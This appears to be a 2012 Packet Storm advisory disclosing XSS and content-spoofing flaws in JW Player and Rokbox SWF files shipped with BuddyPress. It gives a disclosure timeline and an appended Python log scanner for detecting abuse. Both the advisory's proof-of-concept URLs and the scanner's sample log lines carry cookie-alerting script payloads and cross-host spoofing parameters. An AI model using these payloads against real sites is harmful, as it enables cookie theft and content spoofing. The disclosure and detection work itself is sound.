WordPress BuddyPress Cross Site Scripting / Content Spoofing

🗓️ 21 Dec 2012 00:00:00 · Reported by MustLive · Type: packetstorm
🔗 packetstormsecurity.com

Multiple security vulnerabilities in BuddyPress for WordPress including Content Spoofing and Cross-Site Scripting with JWPlayer and Rokbox

Code
`Hello list!  
  
I want to warn you about multiple security vulnerabilities in the plugin   
BuddyPress for WordPress. I disclosed vulnerabilities in JW Player in   
June and August (including in the commercial version JW Player Pro) and   
disclosed vulnerabilities in Rokbox in December. BuddyPress uses this   
software, so it has the same vulnerabilities.  
  
These are Content Spoofing and Cross-Site Scripting vulnerabilities.   
Different versions of BuddyPress use different versions of swf-files, but in   
total we have the following installations of BuddyPress: with JWPlayer 5.5.1641, with   
JWPlayer 4.2.95, and with Rokbox with JW Player 4.4.198 (in the rt_affinity_wp   
theme). There is a small number of web sites with these swf-files, so these may   
be old versions or some rare versions of BuddyPress. There are many other   
vulnerabilities in this WP plugin and I'll write about them later.  
  
-------------------------  
Affected products:  
-------------------------  
  
Versions of BuddyPress with JWPlayer, or with Rokbox with JWPlayer, are   
vulnerable.  
  
----------  
Details:  
----------  
  
For JWPlayer 5.5.1641 the path is   
http://site/wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf  
  
For JWPlayer 4.2.95 the path is   
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf  
  
For JWPlayer 4.4.198 in the theme rt_affinity_wp for BuddyPress (it's a   
third-party theme) the path is   
http://site/wp-content/plugins/buddypress/bp-themes/rt_affinity_wp-bp12/js/rokbox/jwplayer/jwplayer.swf  
  
XSS (WASC-08):  
  
http://site/wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf?playerready=alert(document.cookie)  
  
In 5.x versions of JW Player there are this XSS and other vulnerabilities   
(http://securityvulns.ru/docs28176.html). In 4.x versions of JW Player there   
are only the following holes.  
  
Content Spoofing (WASC-12):  
  
In the parameter file, both video and audio files can be set.  
  
The swf-file of JW Player accepts arbitrary addresses in the parameters file and   
image, which allows spoofing the content of the flash, i.e. by setting addresses of   
video (audio) and/or image files from another site.  
  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?file=1.flv&image=1.jpg  
  
Content Spoofing (WASC-12):  
  
The swf-file of JW Player accepts arbitrary addresses in the parameter config, which   
allows spoofing the content of the flash, i.e. by setting the address of a config file   
from another site (the parameters file and image in the xml-file accept arbitrary   
addresses). For loading the config file from another site, it needs to have a   
crossdomain.xml.  
  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?config=1.xml  
  
1.xml  
  
<config>  
<file>1.flv</file>  
<image>1.jpg</image>  
</config>  
  
Content Spoofing (WASC-12):  
  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?abouttext=Player&aboutlink=http://site  
  
XSS (WASC-08):  
  
http://site/wp-content/plugins/buddypress/bp-themes/file/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B  
  
------------  
Timeline:  
------------   
  
2012.05.29 - informed developers of JW Player.  
2012.06.06 - disclosed at my site about JW Player.  
2012.08.18 - informed developers about new holes in JW Player Pro.  
2012.08.23 - disclosed at my site about JW Player Pro.  
2012.08.28 - informed developers of Rokbox.  
2012.12.14 - disclosed at my site about Rokbox.  
2012.12.20 - disclosed to the lists about BuddyPress.  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua   
  
`
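The advisory above lists the flashvars that make these SWF files abusable: `playerready` (a JavaScript callback name the 5.x player executes), `aboutlink` with a `data:` or `javascript:` scheme, and `file`, `image`, `config` pointing at another host. Sites that cannot remove the players immediately can at least watch their access logs for such requests. The following detection script is an added example and is not part of MustLive's post or of BuddyPress/JW Player; the log lines it scans are constructed for the example, and the site hostname `www.example.com` is an assumption. It flags any request to `player.swf`/`jwplayer.swf` whose query string carries one of the flashvars described in the advisory, and reports cross-host `file`/`image`/`config` values separately from the XSS vectors.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx common-log prefix: client, ident, user, [timestamp], "request line", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3})'
)
# The SWF file names used by the JW Player builds named in the advisory
SWF_RE = re.compile(r'/(?:jw)?player\.swf$', re.I)
# Schemes that turn the About link into script execution when clicked
SCRIPT_SCHEME_RE = re.compile(r'^\s*(?:javascript|data|vbscript):', re.I)


def parse_flashvars(query):
    """Split a query string into flashvars (name -> list of values).

    Splits on '&' only, so an aboutlink value such as 'data:text/html;base64,...'
    stays in one piece (older urllib.parse.parse_qs treated ';' as a separator too).
    """
    flashvars = {}
    for pair in query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        flashvars.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return flashvars


def classify_request(target, site_host):
    """Return the findings for one request target (path plus query), or [] if benign."""
    parts = urlsplit(target)
    if not SWF_RE.search(parts.path):
        return []
    fv = parse_flashvars(parts.query)
    findings = []
    if 'playerready' in fv:                        # 5.x: JS callback executed by the SWF
        findings.append('xss:playerready')
    for value in fv.get('aboutlink', []):          # link behind the About menu entry
        if SCRIPT_SCHEME_RE.match(value):
            findings.append('xss:aboutlink')
    if 'abouttext' in fv:                          # attacker-controlled About text
        findings.append('spoof:abouttext')
    for param in ('file', 'image', 'config'):      # media/config loaded from any host
        for value in fv.get(param, []):
            host = urlsplit(value).hostname
            if host and host.lower() != site_host.lower():
                findings.append(f'spoof:{param}->{host.lower()}')
    return findings


def scan_log(lines, site_host):
    """Return (ip, target, findings) for every log line that abuses the player flashvars."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        findings = classify_request(m['target'], site_host)
        if findings:
            hits.append((m['ip'], m['target'], findings))
    return hits


# Constructed sample log lines mirroring the PoC URLs in the advisory (not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [21/Dec/2012:10:00:01 +0000] "GET /wp-content/plugins/buddypress/bp-themes/bp-default/jwplayer/player.swf?playerready=alert(document.cookie) HTTP/1.1" 200 57112',
    '203.0.113.5 - - [21/Dec/2012:10:00:02 +0000] "GET /wp-content/plugins/buddypress/bp-themes/file/player.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B HTTP/1.1" 200 41204',
    '198.51.100.7 - - [21/Dec/2012:10:05:17 +0000] "GET /wp-content/plugins/buddypress/bp-themes/file/player.swf?file=http://evil.example/1.flv&image=http://evil.example/1.jpg HTTP/1.1" 200 41204',
    '192.0.2.44 - - [21/Dec/2012:10:06:00 +0000] "GET /wp-content/plugins/buddypress/bp-themes/file/player.swf?file=http://www.example.com/uploads/intro.flv HTTP/1.1" 200 41204',
    '192.0.2.44 - - [21/Dec/2012:10:06:01 +0000] "GET /index.php HTTP/1.1" 200 8812',
]

if __name__ == '__main__':
    for ip, target, findings in scan_log(SAMPLE_LOG, 'www.example.com'):
        print(ip, ', '.join(findings), target)
```

Same-host `file`/`image`/`config` values are deliberately not flagged, since the player legitimately loads its own media that way; only the callback name, script-scheme links, About text, and cross-host references match the behaviour the advisory describes. Relative values such as `file=1.flv` are therefore also left alone, which keeps false positives down but means a same-origin spoof through an uploaded file is not caught by this check.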
